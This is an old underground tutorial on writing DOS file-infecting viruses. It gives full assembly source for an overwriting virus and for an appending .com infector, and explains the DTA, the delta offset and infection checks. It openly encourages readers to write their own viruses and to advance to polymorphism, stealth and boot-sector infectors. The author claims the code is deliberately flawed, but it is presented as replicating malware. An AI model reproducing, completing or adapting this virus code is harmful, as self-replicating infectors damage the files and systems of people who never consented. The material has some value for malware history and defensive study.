~ The Not-Very-Flashy-Yet-Informative-And-Largely-Typoed ~ Virus infection tutorial by Pocket... ~ v0.3 final, I hope...... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~ No hot-air-fulla-shit loud mouthing here, just answers. Someone is always 10 times better than you, or atleast just as good, so those k-rad/elite guys can kiss my ass. Point of this tutorial is to show the reader how and why viruses spread. What the reader intends to do with this information is entirely based on his decisions. Any damages or wrongful doings here are not my problem. I'm simply delivering information, not shooting children. ~ Distributing this tute: Be my guest and send it around, I don't mind. You do not have the authors permission to change the content of this tutorial. About the source code in this tute: The virus this file contains is not meant to be cut&pasted and compiled, since... It doesn't work very well! And I did this on purpose, considering all of those hacked viruses of the past. ~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #1 What do these lil' buggers do?: The Idea behind a computer virus is the same as the workings of a Biological virus. The virus takes advantage of the hosts cells in order to live and spread. Biological viruses usually kill the host in the end, MY computer viruses DO NOT. I do NOT support destructive code. It's not because I like people.. It's not because I don't wanna hurt anyone.. It's because the virus needs a chance to spread! Not a one shot wonder that ends up in McAfee 2 months before it's activation date. #2 Ok, so what's the "guts" of a computer virus? The workings of a computer virus goes as follows: Step 1: Find a "host". Generally, *.com or *.exe's, though many viruses infect other files, and the ocassional BootSector. #2: Check this file for infection criteria. This includes making sure the file has read/write permissions, making sure it may not be part of an anti-virus, and making sure that adding our virus to it won't affect the way DOS (or other OS) runs it. #3: Open the file and (maybe) return to step 2. If there is an error, return to step 1. #4: Write our code to it. #5: Close it up and send it on it's merry little way. #3 I understand the logic behind that, but how do you actually do it?! Generally, most viruses are written in assembly. Assembly language is alot more powerful and compact than alot of languages, but C++ is a decent way to START! I'll basically do most of this tutorial in Assembly.. There's 2 kinds of viruses we can write once we understand the basic theory and a few assembler commands.... Overwriting and Appending....... Overwriting viruses DESTROY the host program, leaving only *maybe* a remnant of the original program. This is bad, because it can be noticed VERY VERY easily! Appending viruses, on the other hand, MODIFY the host, and then execute it properly. No one notices a thing when their files work fine! Basic idea for an overwriting virus: Find the first file... (.com files are easily overwritten) Open the file... Check for infection... Write our code OVER the hosts code.. Close HOST... Basic idea for an appending virus: Jump to our code in current file... Move original bytes of CURRENT file back into place... Find first file... Open file... Check file for previous infection... If no infection, write body of virus to the END of file... Write instructions to jump to our code at beginning of new host... Close file... Jump to hosts bytes and finish running the CURRENT program... #4 Alright, I've been avoiding this, but bring on the Technical shit! A few technical things you'll need to know.... (Note: I'll assume you're learning how to infect .com files,) (and I will only include information here concerning them. ) (Infecting .com files is simple, and it's the easiest way to) (begin because of that. The reason .com files are so easy ) (to infect is because they are read straight into memory, ) (right from the disk. Exe's and other files contain headers) (or other information needed for execution. ) General information on .com files: Like stated before in the note, .com files are read straight from disk and executed. A PSP(Program Segment Prefix) is built from offset 0h to offset 99h of the memory allocated for the program, and the actual code is read into and executed from 100h down. The PSP is not saved to disk, it is simply a temporary space for the stack, DTA, and other things you need not worry about right at this moment. Again, the code that is executed starts and stops in the .com file, a temporary place to hold data is placed BEFORE the actual code and it takes up 99h bytes. The .com file is read from disk and placed at offset 100h, where it begins execution. .exe's and other files contain headers and other information, which are read into memory and are saved to disk. These headers include the stack and other information, like where the file actually begins execution. This makes infecting them trickier (to beginners, anyway) than infecting a .com file. Infecting a .com file simply means altering it's code, infecting .exe's and other files involve altering it's header AND it's code. Find_First File Function and the DTA: (Function 4eh, Int 21h) This will find the FIRST file in the CURRENT directory that matches the data at the offset in the DX register... It then moves this files information into the DTA (Disk Transfer Area). This is an area in the PSP of .com files. The DTA is located at offset 80h of the com file by default. However, the DTA can be relocated by DOS INT 21h function 1ah. (!! NOTE: Offset 80h is ALSO the beginning of the command tail!) ( If we are writing an appending virus, calling this function ) ( BEFORE relocating the DTA is NOT acceptable! The command tail) ( of the host program will be OVERWRITTEN. I.E. Format.com /s A:) ( The "/s A:" would be overwritten with garbage, thus making ) ( format.com suspicious AND malfunctioning! ) Data found in the DTA: Assuming that a file is found, this data is moved to the DTA. Offsets in this table are the offsets in the DTA, NOT the .com file! Location and what it's there for: 0h 21 duplicate 0's - Reserved for DOS purposes. 15h db 00 - File's attributes. (Readonly, archive, etc.) 16h dw 0000 - File's time attributes. (Time last modified) 18h dw 0000 - File's data attributes. (Date last modified) 1ah dd 00000000 - File's size. 1eh db 13 dup 0's - Asciiz of FileName. To access this information, we will need to know what the offset of the DTA is (80h in .com files unless moved as stated earlier) Let's say we haven't moved it, and we got a file up there. To get the file's name into the AX register, we'd do this: mov ax,[80h+1eh] 80h being the offset of the START of the DTA, 1eh being the offset of the file's name in asciiz. 9eh would be the offset considering the DTA starts at 80h, and the asciiz of filename start 1eh bytes from the beginning of the DTA. Moving the DTA: As I stated earlier, the DTA will need to be moved from 80h to preserve the hosts files functions. We'd do this by defining 42 duplicate bytes for it's use, and move it there. mov ah,1ah mov dx,offset newdta int 21h newdta db 42 dup (0) To get information out of this new DTA, we'd do this: mov ax,[newdta+1eh] And finally, we'd want to move the DTA back after we're done, or the host will NOT function correctly and be suspicious: mov ah,1ah mov dx,80h int 21h The DTA, put simply, is just a place where temporary data about files is located well.. temporarily. :) Notes on Binary: If you know how this works, skip it. Alot of people don't, though. A binary number looks like this: 0000b. Binary is a Base-2 number system. Base-2 means there are 2 numbers. 0 or 1. 0 represents that this place has no value. 1 represents that this place has a value. 0001 = 1, 0010 = 2, 0011 = 3. Each place is equal to twice the previous value. The bit at the first position stands for 1, the bit at the second position stands for 2, the bit at the 3rd position stands for 4, etc. Notes on Hexidecimal: If you know how this works, skip it. Alot of people don't, though. A hex number looks like this: 0f6h Hexidecimal is a base 16 number system. It goes in order like this: 0 1 2 3 4 5 6 7 8 9 A B C D E F 10 10 in Hex = 16 in Decimal. Play around with this in your head, you'll need it. Notes on sizes: If you know how this works, skip it. Alot of people don't, though. Data can be represented by bits, nibbles, words, and bytes. Look these up for yourself, as this should be elementary to an assembly coder. The ones we will mostly be using are: Bit, Byte, Word, and DoubleWord. A BIT is the basic "block" of information, it can either be a 1 or a 0, and only a 1 or a 0. A BYTE is 8 bits, and is represented in 2 hex numbers. 02h, 0ffh, 0fh, etc. A word is 2 bytes, i.e. 0fffh, 0234h, 2234h, 0f234h, etc. A DWORD (double word) is 2 words put together. Kinda obvious what it is and how it is represented, eh? #5 Ouch, brain hurt..... You'll get used to it, only things you need to memorize are the number systems, sizes of data, and your Assembly operands! Things I recommend learning: Of course I recommend assembly. Learn about "polymorphism", "stealth", and encryption. Learn terminate-and-stay resident functions. Learn about segments and offsets. In detail! Learn how to optimize your code for speed and compact. #6 Ok, I've been waiting long enough, show me some code! Alright, first I'll show some code of an overwriting virus, although these are NOT what you want to sit and write forever. This tute is supposed to start easy and by the time it ends you should know more than when you started. I'd like for all of you to go from this to your own appending viruses, then maybe try encryption, then TSRs, then EXE infections, then Polymorph, then bootsectors, then Multipartite, etc etc etc... I'll assume you're using Tasm 2.0 or Greater, considering I'm using Tasm 5.0.... ;------------------------Start of Source---------------------- ; OverWriter by Pocket, for this Tutorial ;------------------------------------------------------------- overwriter segment assume cs:overwriter org 100h ;Beginning of execution, to ;make room for the PSP, as ;explained earlier. start: jmp real_start db 'G' ;Marker byte, explained later. real_start: mov ah,4eh ;Find the first file... mov dx,offset fmask ;Matching fmask... int 21h jmp open find_next: mov ah,4fh ;Find the next file matching int 21h ;Previous search. open: mov ah,3dh ;Open file... mov al,02h ;Read and write mode... mov dx,09eh ;9eh = Asciiz of file name in DTA. int 21h xchg ax,bx ;Open file moves file_handle to ax, ;However, we need it in bx. mov ah,3fh ;Infection check, so we mov cx,4h ;Don't keep overwriting the same file mov dx,offset temp_buff int 21h cmp byte ptr [offset temp_buff+3],'G' ;Infection check. je find_another ;If infected, find next. mov ah,40h ;Write to file... mov dx,offset start ;Where to copy from... mov cx,(offset vend - offset start) ;How many bytes to write. int 21h mov ah,3eh ;Close and save file... int 21h mov ah,4ch ;Terminate and return to DOS. int 21h fmask db '*.com' vend db 0 overwriter ends end start ;-----------------------End of Source------------------------------------ Basically, this virus finds the first file in the directory, opens that file, writes itself over the information in that file, closes and saves it, then exits to DOS. Ok, this virus is pathetic. Print it out and laugh at it, but it does what it does and that's replicate. If you don't understand the basic workings of this virus, go read more samples that ARE NOT viruses, brush up on Asm opcodes, and try again. DO NOT proceed forward if you can't understand it! #7 Psst, Pocket. This tute is making you look schizophrenic. Bah, shaddup. If it educates someone, I'm allowed to look stupid. #8 Ok, I understand the pathetic excuse of a virus that was included in #6. Alright, good. The virus in #6 is just about the simplest you can get. In fact, It will probably just sit there and overwrite ITSELF repeatedly.... But it illustrates overwriting viruses. Now, the next type of virus I'll show you is an Appending virus. This needs a little bit of explaing before I show it to you..... This type of virus NEEDS to maintain the hosts instructions that it overwrites. Unlike an overwriting virus, an appending virus is NOT executed from 100h, so we'll need to find out where in the host we are executing from. The displacement is called the 'delta offset', explained in detail shortly. Notes for appending: As stated, we'll need to save any bytes we modify in the file and restore them when we're done. We will also need to move the DTA so the command tail is not overwritten. Also, we'll need to read and save the original bytes of the .com we're infecting, so it executes correctly later. A jump to our code at offset 100h is mandatory, too. The MOST important thing about an appending virus is what's called the "delta offset".. This is just the number of bytes our code is displaced by. Without this, our virus will just be a hunk of code that malfunctions aimlessly. The method (probably the only method, but never say never) we'll use starts with a CALL, then a POP BP, and then we'll subtract where the offsets SHOULD be by BP... First thing you wanna know is, why is this magic delta offset number appearing in BP? Well, the truth is the number isn't magic and you don't always have to use BP to store it... First you gotta know how CALL works.... When you CALL something, it means you want to run the routine and then return to where you were before. CALL needs to keep track of where you were in order to return, right? Well, it does this by PUSH'ing the offset of the NEXT instruction onto the stack. So you POP it into BP and then subtract it from where the offsets SHOULD BE... Kinda hard to understand to some people, so make a mental picture of some stairs... Picture some candy on stair 7, and you're on stair 1. Imagine someone picks you up and puts you on stair 3. Now, from stair 1 you had to walk 7-1 stairs = 6. If you walk 6 stairs after someone put you on stair 3, you'd pass the candy! But, if you just subtract your current step from the steps you would've had to cross earlier, you'd get the delta offset..( stair 3 - previous distance(6)) = 3. 3 more stairs and you'll get the candy. Understand? The delta offset is basically just how you keep track of the new offsets of the code, by adding where the code was at compile time and how many bytes it is displaced by. A way to identify for previous infection is always good, consideing we don't just want to repeatedly enlarge one file aimlessly on and on and on and on and on and on and on and on and on. #9 Ok, I can understand that, where's the source for it? There's enough examples on IRC and the 'net of appending viruses... So this is rather redundant.... BUT... I will show you some important routines and how the entire virus works. And like the overwriting virus, this one will be just as stupid... Appending Viruses 101: And appending virus typically infects files by appending their code to the end of the file, and writing a jmp instruction over the first few bytes. The jmp instruction transfers control from the original file to the virus. After control is transferred, we'll need to find the Delta offset.... Universal code for this is: call next next: pop bp sub bp,offset next This will give you the displacement in the BP register... Once we've gotten that, we need to use it in our code.... Example of no delta offset: mov ah,09h ;This will write the string in 'msg' to screen. mov dx,offset msg int 21h Example of using the delta offset: mov ah,09h ;This does the same thing, but with the delta offset code. lea dx,[offset msg + bp] int 21h The jmp instruction: Our virus needs to transfer control from the host program to us. This is done by overwriting the first few bytes with a jmp to our code. (The bytes will be patched back in later). The jmp to our code will be the length of the host BEFORE infection, since we're writing our code to the END of the file, and executing from there. There are a few different ways to find the files original length, and the length is not changed until the file is closed, so this can go practically anywhere. 2 ways to get the original host size: You can get the hosts size by using the DTA, or you can get it after calling function 4202h, Int 21h (lseek eof). Look this up for yourself.. :) Patching the host to working order: We'll need to read the first couple bytes before we infect the file so the hosts aren't suspicious. After infection, the host should run in this manner: Jmp instruction will transfer control to virus. Virus will infect next file, or any other virussy thing. Virus will restore original bytes to beginning. Virus will return control to host. Host will execute. Before infecting the file, you should use function 3fh, Int 21h to read the original byte and save them somewhere in the virus. After the virus finished running, the bytes need to be restored and executed. Movs* operands can be used to move these back to their proper place. Movs* (movsw, movsb, etc) read what's addressed by ds:si and place it in the area addressed by es:di, we're only moving bytes inside of the .com files restricted memory, so ds and es need not be worried about. Simply remember, si=source, di=destination. Code for restoring bytes: mov di,100h ;Address 100h... lea si,[offset oldbytes+bp] ;Where the original bytes are. mov cx,(# of bytes) ;Cx = number of times to 'rep' an operand. rep movsb ;movsb n number of times, where n=CX Then a "mov bp, 100h, jmp bp" will suffice. This should be enough to get you started, but let's brush up on appending virus execution: 1. Jmp to virus code. 2. Find delta, move the DTA, etc. 3. Find a file to infect. 4. Check for infection criteria. 5. Open file, read the first few bytes, and save them. 6. Write jmp instruction to beginning of host, append virus to end of new host. 7. Close newly infected file and execute current host as normal. I highly recommend moving the oldbytes to their original place BEFORE doing anything else, since this is easily forgotten and if you do it after you infect the next file, you'll have the wrong bytes in the wrong file, causing a crash.. Checking for infection: There are a few ways to do this, I'll just explain the most common 2. Easiest way is to just put a marker of some sort into the first few bytes. Most optimized/best way is to just check for infection using the JMP offset at the beginning of a file. The Marker Byte check is included in the source for the overwriting virus. The marker byte method is rather simple, you just read the first 4 or more bytes of the file you want to infect, store them, and write the mandatory 3 (jmp and offset to the virus), and then a marker. Then simply compare the fourth byte of a potential host with your marker byte. Another easy way, yet it confuses some people, is reading the first 3 byte as usual, and comparing the second and third bytes to what the offset of a jmp to our virus WOULD BE, if the file is actually infected. Just remember that the offset of the jmp you write to files IS the size of the original file BEFORE infection. So simply get the number where the jmp offset WOULD BE- if this file is actually infected, get the size of the current file, subtract the current size from the virus size and then subtract it by 3 (the size of the jmp instruction), and compare it to the number where the jmp offset WOULD BE- if infected. jmp_offset - current_size-vir_size-3 would equal 0 if the file is actually infected. (Use a compare instruction, that is just an example. :)) #11 Source, source, source, source.... I got this weird feeling you want source.. So here it is. Commented by kRaCkBaBy in his return to the virus scene..! Welcome back, kB! ;<-----------------Beginning of Source-------------------------------------> append segment ;Comments bY: krackbaby assume cs:append, ds:append ;assume segments org 100h ;all .COM files start at 100h start: jmp next db 'I''m a first gen!',0 ;A first generation virus ;Is a virus without a host, ;It usually infects itself ;once, and then infects other ;files. next: call setup ;call to determine delta offset setup: pop si ;get the current IP sub si,offset setup ;and subtract from original ;The "Delta Offset" :) mov ah,1ah ;put 1ah function in ah lea dx,[offset newdta+si] ;to move the DTA int 21h ;so we don't corrupt it push si lea si,[offset oldbytes+si] ;Restore original bytes mov di,100h ;to host at 100h mov cx,3 ;so it executes correctly. rep movsb ;Repeat as long as cx doesn't equal 0 pop si mov ah,4eh ;put 4eh into ah for the find1st function lea dx,[offset fmask+si] ;with this file mask *.COM mov cx,0007h ;this sets the attributes int 21h ;to archive only jc clean_up ;jump on carry to clean_up jmp open ;jump to the open label find_another: mov ah,3eh ;put 3eh in ah for the int 21h ;close file function mov ah,4fh ;put 4fh in ah for the int 21h ;findnext function jc clean_up ;jump on carry to clean_up open: mov ax,3d02h ;put 3d02 in ax to open read/write access lea dx,[offset newdta+1eh+si] ;using the dta we put here int 21h ;(int21h) if you don't know what ;if you dont know what it is you need to read more xchg ax,bx ;when we open it the handle is ;returned in AX so we need it in bx no_no_check: ;******????? mov ah,3fh ;move 3fh for read lea dx,[offset oldbytes+si] ; mov cx,3 ;how many bytes to read int 21h mov ax,[offset newdta+1ah+si] ;Get filesize from DTA. sub ax,3 ;Subtract by 3. (Size of jmp offset) mov [offset newbytes+si+1],ax ;Move the new jmp offset to it's buffer. sub ax,(offset vend-offset next) ;Subtract ax by virus size. cmp word ptr [oldbytes+1+si],ax ;check for infection.... je find_another ;Find another if this one is infected! mov ax,4202h ;4202h is the move file cwd ;pointer function xor cx,cx ;put 0 in cx int 21h ;move to end of file mov ah,40h ;40h is the write funtion lea dx,[offset next+si] ;where to start mov cx,(offset vend-offset next) ;how many bytes to write int 21h mov ax,4200h ;4200h is the move file cwd ;pointer function xor cx,cx ;put 0 in cx int 21h ;move to beginning of file mov ah,40h ;write to file function lea dx,[offset newbytes+si] ;bytes to write mov cx,3 ;how many bytes to write int 21h clean_up: mov ah,3eh ;close file function int 21h mov ah,1ah ;return the DTA to its mov dx,80h ;proper place int 21h mov si,100h ;put 100h where com files start :) jmp si ;jump to host control fmask db "*.com",0 ;file mask newbytes db 0e9h,00h,00h ;place to store the jump instruction oldbytes db 0cdh,20h,00h ;place to store the original bytes of host vend db 0 ;Virus end marker. newdta db 42 dup (?) ;buffer to store DTA append ends end start #12 It can't be the end! I want more! Too bad.. :) This should be enough information to get you on your way to writing and understand file viruses better. You may be able to write one now.. Try it! If you don't succeed, ask for help or try reading this again. Good luck on your new career, be it VXer or AVer. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Welp, this is the end.. I hope I fed you enough tecnical facts about how the DTA, Delta Offset, and viruses in general work.. I recommend finding a copy of the "HelpPC" database, if you're just starting out in assembler, and if not it's still a bit of help in other cases. Have a nice day, pay at the 2nd window, and don't infect yourself. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ About the Author: Pocket hasn't released any viruses into the wild (*purposely*), and has never been infected unless he did it on purpose.. :) Pocket doesn't really know why he's talking in 3rd person right now, but he's gonna stop. As mentioned before, I do NOT like destructive payloads, because it doesn't allow the virus to spread as far as it COULD without the payload... Just think about that... Greets: The first version of this tute got kinda popular! So it's time to add one of those greets sections. kRaCkBaBy- Thanks for commenting, welcome back! Lych- Wanker... Thanks for proof-reading this shit! #virus on Undernet- Get the server up already! rebyc- Erm, visiting just to say hi to little ol' me? How tweet... LT- Hey, get the mag out, I've written almost 2 of these already! Isomer- Start saying 'erm'. Yosha- You just need to be in the greets. Start saying 'erm', too. Random- Off the dope, man, yer getting stupid... :P WarBlade- Quit teasing about how you live near me, where the fuck do you live?! FlmWombat & Marc- You guys make #virus what it is today. Mostly.. :) X and all the bots on IRC: Love talking to you, don't leave, ok? Prometh- Spiff up the page man, thanks for distroing this piece o' shit! Ratboy- Your tutes were just the shit.. hehe. RockSteady of Nuke- Your tutes were just shit... Vlad- Don't lose it now, yer just starting! All those other people I was too lazy to mention- Hi... and stuff. And last but not least, my girlfriend Kim, who has shown me how to be happy again, without worrying about what other people thing. Readers should pray to any God they believe in that we don't have kids, Mini-Pockets! Scary! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Out!~